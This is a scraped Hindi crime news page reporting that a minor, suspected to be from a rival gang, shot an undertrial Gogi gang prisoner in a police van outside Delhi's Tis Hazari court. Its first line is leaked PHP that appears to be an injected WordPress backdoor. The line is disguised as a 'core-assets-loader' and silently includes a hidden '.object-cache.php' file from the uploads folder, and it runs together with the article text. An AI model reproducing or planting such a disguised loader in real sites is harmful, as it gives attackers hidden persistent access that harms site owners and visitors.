add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); तीस हजारी कोर्ट के बाहर फायरिंग, विचाराधीन कैदी को मारी गोली – SOCH INDIA
Menu

अपराध समाचार
तीस हजारी कोर्ट के बाहर फायरिंग, विचाराधीन कैदी को मारी गोली

nobanner

राष्ट्रीय राजधानी की तीस हजारी अदालत के बाहर आज पुलिस वैन में बैठे एक विचाराधीन कैदी को प्रतिद्वंदी गिरोह के एक सदस्य ने गोली मार दी.
विचाराधीन कैदी को अस्पताल में भर्ती कराया गया है.

पुलिस ने बताया कि दिल्ली-एनसीआर में सक्रिय गोगी गिरोह के संदिग्ध सदस्य दिनेश को हरियाणा पुलिस रोहतक जेल से एक मामले में पेश करने के लिए अदालत लायी थी.पुलिस ने बताया कि यह घटना अदालत परिसर के गेट नंबर 2 के नजदीक हुई जब वह हरियाणा पुलिस के वाहन में बैठा था.

पुलिस ने बताया कि हमलावर नाबालिग है जिसे पकड़ लिया गया.पुलिस को संदेह है कि नाबालिग तुली गिरोह का सदस्य है. मामले की जांच की जा रही है.